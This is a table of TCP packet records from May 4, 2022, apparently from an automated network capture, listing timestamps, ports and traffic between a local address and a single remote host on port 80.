| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| May 4, 2022 16:28:12.382318974 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.405189991 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.405378103 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.405919075 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.428312063 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702059031 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702090979 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702105045 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702121019 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702136993 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702148914 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702167034 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702183008 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702203035 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702209949 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.702255011 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.702266932 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.702269077 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702271938 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.702327967 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.702478886 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702497005 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702508926 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702523947 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.702532053 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.702567101 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.702583075 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.724806070 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.724833012 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.724847078 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.724864006 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.724880934 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.724905014 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725003004 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725048065 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725060940 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725080967 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725092888 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725120068 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725162983 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725205898 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725224972 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725238085 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725264072 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725292921 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725359917 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725378990 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725403070 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725414038 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725431919 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725497961 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725514889 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725526094 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725553036 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725569963 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725687027 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725738049 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725744009 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725750923 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725786924 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725850105 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725867987 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725879908 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.725903034 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725924969 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.725980997 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.726032019 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.726035118 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.726043940 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.726079941 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.726136923 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.726154089 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.726165056 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.726188898 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.726208925 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.747716904 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747744083 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747756958 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747775078 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747792006 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747803926 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747845888 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.747883081 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747888088 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.747894049 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.747908115 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747920036 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747967005 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.747973919 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.747977018 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.747989893 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748003006 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748045921 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748080015 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748193979 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748214006 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748224974 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748243093 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748244047 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748267889 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748290062 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748307943 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748327017 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748339891 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748358965 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748369932 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748378038 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748389959 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748397112 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748410940 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748435974 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748473883 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748517990 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748537064 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748553038 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748568058 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748568058 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748598099 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748609066 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748617887 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748635054 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748646975 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.748670101 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.748683929 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.749133110 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.749152899 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.749191046 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.749191999 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.749205112 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.749231100 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.749244928 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.749260902 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.749279976 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.749295950 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.749309063 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.749337912 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.749349117 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.749985933 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750006914 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750036001 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750046968 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750062943 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750065088 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.750078917 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750082016 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.750094891 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750107050 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750130892 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.750149012 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.750727892 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750747919 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750762939 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750776052 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750792027 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750793934 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.750806093 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.750823021 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.750859976 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.770816088 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770842075 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770858049 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770874023 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770888090 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770903111 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770917892 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770929098 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770977020 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.770982981 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.770994902 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771011114 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771018028 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771024942 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771028042 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771029949 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771038055 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771051884 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771071911 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771256924 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771296024 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771311998 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771327972 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771334887 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771354914 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771368027 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771384954 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771401882 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771416903 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771431923 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771446943 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771457911 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771461964 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771475077 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771518946 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771641016 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771677971 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771693945 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771708012 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771722078 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771742105 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771744967 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771761894 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771800041 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771811008 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771816969 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771832943 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771852016 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771866083 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771871090 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771882057 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771899939 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771912098 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771919012 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771935940 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771953106 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771954060 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771967888 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.771970987 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.771987915 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772000074 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772006989 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772020102 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772058964 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772078037 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772097111 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772113085 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772130013 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772130966 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772147894 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772160053 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772186995 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772190094 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772207022 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772207975 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772223949 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772238016 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772253036 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772268057 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772270918 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772280931 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772283077 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772298098 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772322893 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772514105 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772535086 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772567034 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772583961 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772588968 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772600889 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772613049 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772623062 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772631884 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772649050 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772665024 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772665977 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772681952 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772700071 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772701979 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772711992 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772732973 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772737026 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772751093 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772768021 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772809982 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772830963 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772875071 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772893906 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772895098 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772902012 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772912025 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772918940 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772928953 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772938013 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772941113 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.772962093 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.772983074 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773092031 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773111105 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773127079 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773144960 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773155928 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:12.773163080 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:12.773180008 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
